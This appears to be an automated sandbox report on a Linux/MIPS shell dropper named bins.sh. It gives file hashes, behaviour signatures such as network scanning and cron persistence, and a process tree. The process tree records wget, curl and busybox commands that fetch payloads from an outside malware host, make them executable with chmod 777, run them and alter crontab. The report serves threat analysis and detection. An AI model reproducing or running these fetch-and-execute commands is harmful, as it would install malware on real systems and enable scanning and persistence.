Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    09-11-2024 04:20

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    e0e937bb99f87489de87877ed4f4ab32

  • SHA1

    74fc4c4763b0eb2c3fd6ae02b523d07265459f2d

  • SHA256

    bc293307089e34718c81627d4ffe57784dca24f2e79a453d04807a28dd9f84fc

  • SHA512

    ff4a387f24869f556779add942d1b65d76a3f6c0b54e26f66ce483821bcdbdd09f9e050ed5f5dcfed968bca6e098b5663536f595de4c447c31ce57da395f37fa

  • SSDEEP

    192:wjfmNFBfTom+NQs+IxUD3b90sPa2HPDxBHIjfmNFbwm+NQsheD3d0sPa2zPD1:wjfmNFBfTom+NQs+IxEVPDxBHIjfmNFJ

Malware Config

Signatures

  • Contacts a large (2083) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:699
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:704
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:706
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:720
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:729
        • /bin/chmod
          chmod 777 d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • File and Directory Permissions Modification
          PID:730
        • /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          ./d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:731
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:734
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:735
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:736
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:737
            • /bin/rm
              rm d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR
              2⤵
                PID:739
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/kLcZBrEdR419Qbm97mNOedgKCgCp2aQVIU
                2⤵
                • System Network Configuration Discovery
                PID:830
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/kLcZBrEdR419Qbm97mNOedgKCgCp2aQVIU
                2⤵
                • System Network Configuration Discovery
                PID:835

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR

              Filesize

              151KB

              MD5

              3c90d5820bddcf7c5d1bd21dfa49d958

              SHA1

              5ba05bd489e50af97d6dc45e3a0be60e494d5083

              SHA256

              bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

              SHA512

              54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

            • /var/spool/cron/crontabs/tmp.sZrA9v

              Filesize

              210B

              MD5

              7727494e61722805287f19dde48eea08

              SHA1

              d687998bcc23cf9ba045d377024edec06a4798ba

              SHA256

              5d8ebce38ea31268d68fa830d3539cc243540bf5cadaac0064252b7e1ebeb0a9

              SHA512

              2a3aa17205a289af4b955e06d97510f5cd7fa5a33200bb507f6a69080ad15473f18728a52c17c540bcbf83e52f8a3924d6b35dcde0b6015f9cdc0ca4b1510665